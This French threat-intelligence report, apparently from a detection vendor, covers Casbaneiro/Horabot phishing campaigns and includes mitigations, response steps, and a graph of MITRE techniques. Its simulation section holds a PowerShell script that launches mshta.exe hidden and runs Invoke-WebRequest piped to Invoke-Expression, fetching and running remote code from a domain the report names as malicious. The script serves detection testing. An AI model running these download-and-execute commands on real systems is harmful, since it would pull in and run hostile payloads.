Découverte des campagnes multi-volets Casbaneiro d’Augmented Marauder

Ruslan Mikhalov Chef de la Recherche sur les Menaces chez SOC Prime

Suivre

Découverte des campagnes multi-volets Casbaneiro d’Augmented Marauder

Detection stack

AIDR
Alert
ETL
Query

Rapport
Flux d'Attaque
Détections
Simulations

Enquête

Les chercheurs ont reconstruit la chaîne de bout en bout depuis la première pièce jointe jusqu’à l’exécution de la charge utile finale. Ils ont analysé une étape HTA qui déclenche mshta.exe, suivie d’un chargeur JavaScript/VBScript en deux étapes et de composants AutoIT utilisés pour déchiffrer des conteneurs chiffrés par AES avec une valeur de graine codée en dur. L’analyse statique a confirmé la présence des binaires Horbot et Casbaneiro, ainsi que de la logique anti-analyse qui vérifie les noms d’utilisateurs de sandbox et les artefacts liés aux machines virtuelles. Les observations réseau ont montré une infrastructure C2 protégée par des domaines Cloudflare et une API PHP utilisée pour générer des PDF dynamiques par victime pendant la phase de livraison.

Atténuation

Bloquez ou contrôlez strictement l’exécution de mshta.exe pour le contenu non fiable et renforcez l’inspection des pièces jointes pour les chaînes basées sur ZIP/HTA/script. Surveillez les comportements anormaux de PowerShell qui interagissent avec les objets COM d’Outlook, pouvant indiquer une propagation pilotée par la boîte aux lettres. Au niveau du réseau, bloquez ou alertez sur les domaines et adresses IP malveillants identifiés, et appliquez le filtrage d’URL pour restreindre l’accès aux services de génération de PDF utilisés pour la mise en scène. Utilisez une liste blanche d’applications pour empêcher les interpréteurs AutoIT de s’exécuter sans approbation explicite.

Réponse

Lorsqu’une activité est détectée, isolez le point de terminaison, arrêtez les processus mshta.exe et PowerShell suspects, et supprimez les nouveaux artefacts créés – particulièrement les fichiers déposés dans les répertoires publics. Collectez les étapes HTA, VBS et AutoIT pour un examen médico-légal, puis recherchez staticdata.dll et at.dll sur les hôtes affectés. Réinitialisez les identifiants pour les comptes email compromis, désactivez l’automatisation ou les règles COM malveillantes d’Outlook, et mettez à jour le contenu de détection avec les IOCs extraits tout en surveillant la propagation latérale et le phishing consécutif depuis les boîtes de réception détournées.

Mots-clés : Maraudeur Augmenté, Water Saci, Casbaneiro, Horbot, Amérique latine, phishing espagnol, leurre WhatsApp, ClickFix, HTA, mshta.exe, VBScript, JavaScript loader, AutoIT, PowerShell, COM d’Outlook, décryptage AES, UUID ZIP, PDF protégé par mot de passe, Cloudflare C2, API PHP, cheval de Troie bancaire, prise de contrôle de compte email.

"graph TB %% Class Definitions classDef action fill:#99ccff classDef tool fill:#cccccc classDef file fill:#e6e6e6 classDef process fill:#ffdd99 classDef malware fill:#ff9999 classDef persistence fill:#ccffcc classDef c2 fill:#ffcc99 classDef operator fill:#ff9900 %% Node definitions action_phish_attach["Action – T1566.001 Phishing: Pièce jointe Spearphishing Email malveillant avec PDF protégé par mot de passe se faisant passer pour une convocation judiciaire"] class action_phish_attach action action_phish_link["Action – T1566.002 Phishing: Lien Spearphishing Lien dans le PDF déclenche le téléchargement automatique d’un fichier ZIP avec nom UUID aléatoire"] class action_phish_link action file_zip["Fichier – Archive ZIP Contient le fichier HTA"] class file_zip file file_hta["Fichier – Fichier HTA Exécuté via mshta.exe"] class file_hta file process_mshta["Processus – mshta.exe Charge JavaScript qui récupère le VBScript de seconde étape"] class process_mshta process script_vb["Action – T1059.005 Interpréteur de commandes et de scripts : Visual Basic Vérifications de sandbox et téléchargement de la charge utile"] class script_vb malware action_sandbox_evasion["Action – T1497.002 Évasion de Virtualisation/Sandbox Vérifications basées sur l’activité de l’utilisateur pour les noms d’utilisateur de sandbox et artefacts VM"] class action_sandbox_evasion action action_deobfuscation["Action – T1140 Déobfuscation/Décode de fichiers ou d’informations Déobfuscation à l’exécution des chaînes et du code"] class action_deobfuscation action script_powershell["Action – T1059.001 Interpréteur de commandes et de scripts : PowerShell Télécharge l’interpréteur AutoIT et récolte les contacts Outlook"] class script_powershell malware tool_outlook["Outil – Objets COM Outlook Racle le carnet d’adresses pour la propagation par email"] class tool_outlook tool tool_autoit["Outil – AutoIT Scripts compilés produisent des charges utiles chiffrées"] class tool_autoit tool action_compile["Action – T1027.004 Fichiers ou informations obfusqués : Compiler après livraison Charges utiles compilées sur l’hôte avant exécution"] class action_compile action malware_dll["Malware – DLLs chiffrés (staticdata.dll, at.dll)"] class malware_dll malware process_reflect_load["Processus – Chargement DLL réflectif Charge les DLLs directement en mémoire sans écrire sur disque"] class process_reflect_load process action_injection["Action – T1055.001 Injection de processus : Injection DLL DLLs chargées de manière réflective injectées dans les processus"] class action_injection action persistence_shortcut["Persistance – T1547.009 Modification de Raccourci LNK placé dans le dossier Démarrage"] class persistence_shortcut persistence c2_communication["C2 – T1102 Service Web HTTP GET/POST via domaines protégés par Cloudflare"] class c2_communication c2 tool_turo["Outil – Turo.exe (compilé AutoIT)"] class tool_turo tool tool_tekojac["Outil – Tekojac.exe (Auto2Exe)"] class tool_tekojac tool action_masquerade["Action – T1036.008 Mascarade Les fichiers PDF et ZIP paraissent légitimes"] class action_masquerade action %% Connections action_phish_attach –>|livre| file_zip file_zip –>|contient| file_hta file_hta –>|exécuté par| process_mshta process_mshta –>|charge| script_vb script_vb –>|réalise| action_sandbox_evasion action_sandbox_evasion –>|mène à| action_deobfuscation action_deobfuscation –>|révèle| script_powershell script_powershell –>|utilise| tool_outlook script_powershell –>|télécharge| tool_autoit tool_autoit –>|produit| action_compile action_compile –>|génère| malware_dll malware_dll –>|chargé par| process_reflect_load process_reflect_load –>|active| action_injection action_injection –>|injecte dans| process_mshta action_injection –>|active| persistence_shortcut persistence_shortcut –>|maintient| c2_communication script_powershell –>|télécharge| tool_turo script_powershell –>|télécharge| tool_tekojac action_masquerade –>|couvre| action_phish_attach action_masquerade –>|couvre| action_phish_link %% Styling class action_phish_attach action class action_phish_link action class file_zip file class file_hta file class process_mshta process class script_vb malware class action_sandbox_evasion action class action_deobfuscation action class script_powershell malware class tool_outlook tool class tool_autoit tool class action_compile action class malware_dll malware class process_reflect_load process class action_injection action class persistence_shortcut persistence class c2_communication c2 class tool_turo tool class tool_tekojac tool class action_masquerade action "

Flux d’Attaque

Voir

Exécution de Simulation

Pré-requis : Le contrôle préalable de la télémétrie et de la base doit avoir été passé.

Justification : Cette section détaille l’exécution précise de la technique d’adversaire (TTP) conçue pour déclencher la règle de détection. Les commandes et le récit DOIVENT refléter directement les TTPs identifiés et viser à générer exactement la télémétrie attendue par la logique de détection. Des exemples abstraits ou non liés mèneront à un mauvais diagnostic.

Récit d’Attaque & Commandes :
L’acteur de la menace vise à établir un point d’appui sur une station de travail victime en utilisant Mshta pour télécharger et exécuter une charge utile HTA malveillante hébergée à https://ge.factu.it.com/GZSPEGIJ/YFSBNPQK. Immédiatement après, l’acteur utilise PowerShell pour télécharger un script de seconde étape depuis le même domaine via Invoke-WebRequest et l’exécute en mémoire. Les deux binaires sont lancés à partir d’une invite de commande élevée pour augmenter la probabilité de journalisation d’audit.

Script de Test de Régression :

# Simulation Horabot – déclenche à la fois mshta et PowerShell dans la même session
# 1. Lancer Mshta avec URL malicieuse
$htaUrl = "https://ge.factu.it.com/GZSPEGIJ/YFSBNPQK"
Start-Process -FilePath "$env:SystemRootsystem32mshta.exe" -ArgumentList $htaUrl -WindowStyle Hidden

# 2. Lancer PowerShell pour télécharger et exécuter un script à distance
$psUrl = "https://ge.factu.it.com/GZSPEGIJ/YFSBNPQK/payload.ps1"
Start-Process -FilePath "$env:SystemRootSystem32WindowsPowerShellv1.0powershell.exe" `
    -ArgumentList "-NoProfile -ExecutionPolicy Bypass -Command `"Invoke-WebRequest -Uri '$psUrl' -UseBasicParsing | Invoke-Expression`"" `
    -WindowStyle Hidden

Commandes de Nettoyage :

# Terminer tous les processus malveillants persistants (s'ils ont survécu)
Get-Process -Name mshta, powershell -ErrorAction SilentlyContinue | Stop-Process -Force

# Supprimer tous les fichiers qui auraient pu être déposés (exemples d'emplacements)
$paths = @(
    "$env:TEMPpayload.ps1",
    "$env:APPDATAMicrosoftWindowsStart MenuProgramsStartupmalicious.hta"
)
foreach ($p in $paths) {
    if (Test-Path $p) { Remove-Item -Path $p -Force }
}

Rejoignez la plateforme Detection as Code de SOC Prime pour améliorer la visibilité sur les menaces les plus pertinentes pour votre entreprise. Pour vous aider à démarrer et à générer une valeur immédiate, planifiez dès maintenant une réunion avec des experts de SOC Prime.

Rejoindre gratuitement